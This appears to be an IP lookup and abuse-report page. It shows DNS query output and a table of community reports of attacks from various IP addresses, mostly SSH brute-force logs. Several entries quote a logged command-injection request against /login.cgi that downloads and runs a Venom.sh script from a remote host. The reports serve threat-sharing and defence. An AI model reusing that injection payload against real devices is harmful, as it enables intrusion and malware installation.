城市(city): unknown
省份(region): unknown
国家(country): Japan
运营商(isp): unknown
主机名(hostname): unknown
机构(organization): unknown
使用类型(Usage Type): unknown
b
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 150.41.19.94
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 21364
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;150.41.19.94. IN A
;; AUTHORITY SECTION:
. 30 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2025011602 1800 900 604800 86400
;; Query time: 11 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Fri Jan 17 08:05:14 CST 2025
;; MSG SIZE rcvd: 105
Host 94.19.41.150.in-addr.arpa. not found: 3(NXDOMAIN)
Server: 183.60.83.19
Address: 183.60.83.19#53
** server can't find 94.19.41.150.in-addr.arpa: NXDOMAIN
| IP | 类型 | 评论内容 | 时间 |
|---|---|---|---|
| 41.238.136.214 | attackbots | 1 attack on wget probes like: 41.238.136.214 - - [22/Dec/2019:18:20:33 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11 |
2019-12-23 15:37:38 |
| 156.219.251.174 | attack | DLink DSL Remote OS Command Injection Vulnerability, PTR: host-156.219.174.251-static.tedata.net. |
2019-12-23 15:24:44 |
| 128.199.142.0 | attackbotsspam | $f2bV_matches |
2019-12-23 15:48:22 |
| 41.237.222.250 | attackspambots | 1 attack on wget probes like: 41.237.222.250 - - [22/Dec/2019:19:26:26 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11 |
2019-12-23 15:45:49 |
| 222.186.190.2 | attackspam | 2019-12-23T07:35:18.012237abusebot-2.cloudsearch.cf sshd[7730]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.190.2 user=root 2019-12-23T07:35:19.199153abusebot-2.cloudsearch.cf sshd[7730]: Failed password for root from 222.186.190.2 port 16248 ssh2 2019-12-23T07:35:22.723693abusebot-2.cloudsearch.cf sshd[7730]: Failed password for root from 222.186.190.2 port 16248 ssh2 2019-12-23T07:35:18.012237abusebot-2.cloudsearch.cf sshd[7730]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.190.2 user=root 2019-12-23T07:35:19.199153abusebot-2.cloudsearch.cf sshd[7730]: Failed password for root from 222.186.190.2 port 16248 ssh2 2019-12-23T07:35:22.723693abusebot-2.cloudsearch.cf sshd[7730]: Failed password for root from 222.186.190.2 port 16248 ssh2 2019-12-23T07:35:18.012237abusebot-2.cloudsearch.cf sshd[7730]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhos ... |
2019-12-23 15:39:03 |
| 41.236.27.33 | attackspam | 1 attack on wget probes like: 41.236.27.33 - - [22/Dec/2019:19:27:22 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11 |
2019-12-23 15:28:19 |
| 1.160.82.95 | attackspam | firewall-block, port(s): 2323/tcp |
2019-12-23 15:24:13 |
| 130.61.122.5 | attackbotsspam | Dec 23 07:53:24 * sshd[19631]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=130.61.122.5 Dec 23 07:53:26 * sshd[19631]: Failed password for invalid user admin from 130.61.122.5 port 47950 ssh2 |
2019-12-23 15:22:56 |
| 185.101.231.42 | attackspam | Dec 23 12:27:21 gw1 sshd[8792]: Failed password for nobody from 185.101.231.42 port 57196 ssh2 Dec 23 12:32:03 gw1 sshd[9014]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=185.101.231.42 ... |
2019-12-23 15:40:05 |
| 218.92.0.138 | attackspam | Dec 23 10:07:48 server sshd\[8522\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.138 user=root Dec 23 10:07:51 server sshd\[8522\]: Failed password for root from 218.92.0.138 port 19122 ssh2 Dec 23 10:07:54 server sshd\[8522\]: Failed password for root from 218.92.0.138 port 19122 ssh2 Dec 23 10:07:57 server sshd\[8522\]: Failed password for root from 218.92.0.138 port 19122 ssh2 Dec 23 10:08:01 server sshd\[8522\]: Failed password for root from 218.92.0.138 port 19122 ssh2 ... |
2019-12-23 15:22:27 |
| 41.42.109.76 | attack | 1 attack on wget probes like: 41.42.109.76 - - [22/Dec/2019:07:48:15 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11 |
2019-12-23 15:55:51 |
| 37.187.114.135 | attackspambots | Dec 23 02:16:11 plusreed sshd[5299]: Invalid user server from 37.187.114.135 ... |
2019-12-23 15:27:02 |
| 138.197.162.32 | attackspam | Dec 23 07:26:02 sip sshd[14737]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.197.162.32 Dec 23 07:26:04 sip sshd[14737]: Failed password for invalid user temp from 138.197.162.32 port 34460 ssh2 Dec 23 07:31:32 sip sshd[14789]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.197.162.32 |
2019-12-23 15:27:29 |
| 185.245.87.208 | attackspam | Fishing for exploits - /.env |
2019-12-23 15:53:29 |
| 114.67.80.209 | attack | Dec 23 08:40:45 vps691689 sshd[18032]: Failed password for root from 114.67.80.209 port 45310 ssh2 Dec 23 08:49:53 vps691689 sshd[18287]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=114.67.80.209 ... |
2019-12-23 15:50:28 |